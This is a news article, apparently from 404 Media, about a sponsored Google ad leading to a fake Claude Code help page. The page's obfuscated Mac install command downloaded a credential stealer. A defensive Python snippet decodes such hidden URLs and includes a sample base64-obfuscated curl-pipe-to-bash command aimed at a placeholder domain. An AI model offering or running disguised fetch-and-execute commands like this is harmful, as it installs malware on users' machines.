A top result on Google for people searching for Claude plugins sent users to a site that recently contained malicious code in an apparent attempt to steal their credentials.

The news shows how the explosion of interest in generative AI tools is giving hackers new ways to attack users.



The malicious site was flagged to us by a 404 Media reader who was using Claude.

“I was googling to troubleshoot get my Claude Code CLI to authenticate its github plugin to my Github account and may have stumbled upon a malicious site hosted on Squarespace of all places,” the reader, Dan Foley, told me in an email.

Foley searched for “github plugin claude code” and the top result was a sponsored ad for a Squarespace site with the title “Set up Claude Code – Claude Code Docs.”

When he clicked through, he saw a site that was pretending to be the official site for Anthropic’s Claude, with similar design and branding.

The phony Anthropic help site had swapped some of the Claude Code installation instructions for others, Foley pointed out. That included a line users could paste into their terminal to allegedly install the software on a Mac. The command included an obfuscated URL, hiding what its real destination was. When Foley decoded it, he found it downloaded software from another site entirely.
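To illustrate the kind of check Foley describes, here is a minimal Python sketch that inspects a pasted install command without running it. The article does not say how the URL was obfuscated, so the sketch assumes base64 encoding, one common approach. The function name `reveal_hidden_urls`, the sample command, and the `example.invalid` domain are all hypothetical and not taken from the actual malicious site.

```python
import base64
import binascii
import re

# Runs of base64 characters long enough to plausibly hide a URL.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def reveal_hidden_urls(command: str) -> list[str]:
    """Return URLs found by base64-decoding suspicious runs in a shell command.

    The command is only treated as text; nothing is executed or fetched.
    """
    urls = []
    for candidate in B64_RUN.findall(command):
        try:
            decoded = base64.b64decode(candidate, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64 text, so ignore this run
        if decoded.startswith(("http://", "https://")):
            urls.append(decoded.strip())
    return urls


# Hypothetical example: build a command that hides a placeholder URL.
hidden = base64.b64encode(b"https://example.invalid/install.sh").decode("ascii")
sample = f'curl -fsSL "$(echo {hidden} | base64 -d)" | bash'

print(reveal_hidden_urls(sample))
```

If the decoded destination does not belong to the vendor whose software the page claims to install, that is a strong sign the command should not be run. A real attacker may use a different encoding, in which case this sketch would find nothing.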

ThreatFox, a platform for sharing known instances of malware, recently flagged that domain as sharing a “stealer,” a type of malware that steals users’ credentials. ThreatFox linked that domain to the stealer as recently as a few days ago.

Google’s ad center listed the advertiser behind the malicious sponsored search result as “Enhancv R&D,” which is based in Bulgaria, according to a screenshot of the advertiser profile Foley shared with 404 Media. The advertiser was also listed as being verified by Google, meaning they had to complete an identity verification process which requires legal documentation of their name and location.

Foley said he flagged the ad to Google, which removed the site from search results. The URL which pointed to the potential stealer is no longer online.

“We removed this ad and suspended the account for violating our policies,” a Google spokesperson told me in an email. Google said it has strict policies against ads that aim to phish information or distribute malware, and that it uses a combination of Gemini-powered tools and human review to enforce these policies at scale. Google claims the vast majority of these ads are caught before the ads ever run.

Malicious links in paid Google ads that pretend to be legitimate sites aren’t a problem that’s unique to AI. Hackers often try to get users to click malicious links by pretending to be whatever is popular on the internet at any given moment, be it a pirated movie or video game just before release or celebrity sex tapes. The fact that hackers are targeting Claude users reflects the growing popularity of AI tools and the hackers’ hope that users will not be careful enough to check what they’re clicking when using them.

In January, we wrote about how hackers could similarly target users of the AI agent tool OpenClaw by boosting instructions for AI agents that contained a backdoor for hackers.

About the author

Emanuel Maiberg is interested in little known communities and processes that shape technology, troublemakers, and petty beefs. Email him at emanuel@404media.co
